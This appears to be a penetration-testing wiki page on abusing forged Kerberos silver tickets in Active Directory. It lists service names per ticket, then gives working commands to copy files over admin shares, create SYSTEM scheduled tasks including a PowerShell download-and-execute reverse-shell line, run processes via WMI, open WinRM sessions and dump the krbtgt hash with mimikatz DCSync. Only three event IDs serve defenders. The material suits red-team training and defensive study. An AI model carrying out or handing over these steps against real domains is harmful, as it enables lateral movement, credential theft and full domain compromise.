| | PowerShell Remoting |HOST
Depending on OS also:
| | WinRM |HOST
In some occasions you can just ask for: WINRM
| | Scheduled Tasks | HOST | | Windows File Share, also psexec | CIFS | | LDAP operations, included DCSync | LDAP | | Windows Remote Server Administration Tools |RPCSS
| | Golden Tickets | krbtgt | Using **Rubeus** you may **ask for all** these tickets using the parameter: * `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ### Silver tickets Event IDs * 4624: Account Logon * 4634: Account Logoff * 4672: Admin Logon ## Abusing Service tickets In the following examples lets imagine that the ticket is retrieved impersonating the administrator account. ### CIFS With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like: ```bash dir \\\C$ dir \\\ADMIN$ copy afile.txt \\\C$\Windows\Temp ``` You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**: {% content-ref url="../lateral-movement/" %} [](../lateral-movement/ {% endcontent-ref %} ### HOST With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HOST + RPCSS With these tickets you can **execute WMI in the victim system**: ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic list full /format:list ``` Find **more information about wmiexec** in the following page: {% content-ref url="../lateral-movement/" %} [](../lateral-movement/ {% endcontent-ref %} ### HOST + WSMAN (WINRM) With winrm access over a computer you can **access it** and even get a PowerShell: ```bash New-PSSession -Name PSC -ComputerName; Enter-PSSession PSC ``` Check the following page to learn **more ways to connect with a remote host using winrm**: {% content-ref url="../lateral-movement/" %} [](../lateral-movement/ {% endcontent-ref %} {% hint style="warning" %} Note that **winrm must be active and listening** on the remote computer to access it. {% endhint %} ### LDAP With this privilege you can dump the DC database using **DCSync**: ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **Learn more about DCSync** in the following page: ## References * []( * []( {% content-ref url="" %} []( {% endcontent-ref %}